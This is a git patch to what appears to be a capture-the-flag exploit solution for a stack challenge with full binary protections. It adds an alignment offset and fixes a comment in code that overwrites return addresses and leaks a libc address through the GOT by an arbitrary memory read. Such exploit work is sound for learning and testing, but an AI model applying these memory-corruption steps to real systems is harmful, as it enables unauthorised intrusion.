From 83d01532b8c9dcf2d9101a2fb81401c7932ef7c4 Mon Sep 17 00:00:00 2001
From: Jack Ren <bjrjk@qq.com>
Date: Fri, 17 Sep 2021 14:50:20 +0800
Subject: [PATCH] Fixed full-protection/stack

---
 full-protection/stack/answer.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/full-protection/stack/answer.py b/full-protection/stack/answer.py
index 565193a..efd28ef 100755
--- a/full-protection/stack/answer.py
+++ b/full-protection/stack/answer.py
@@ -61,6 +61,10 @@ print("puts GOT: %s" % hex(puts_got))
 # Cannot use puts PLT to leak puts GOT there at return of main
 # because PIE mode PLT use EBX to store offset but when returning EBX is null
 
+# A unified shift was applied to original shift to use in main's stack frame
+# Because of the compiler's alignment
+unified_shift = 4
+
 # Write main retaddr at shift 89 to call puts
 write_stack(p, 89 + unified_shift, puts_got)
 # Write retaddr of puts at shift 90 back to main
@@ -71,7 +75,7 @@ execute(p)
 puts_libc = u32(p.recv(4))
 """
 
-# Leask puts_got by using a 
+# Leak puts_got by using a arbitary memory read
 puts_libc = read_stack(p, (puts_got - user_stack_base) / 4)
 print("puts libc: %s" % hex(puts_libc))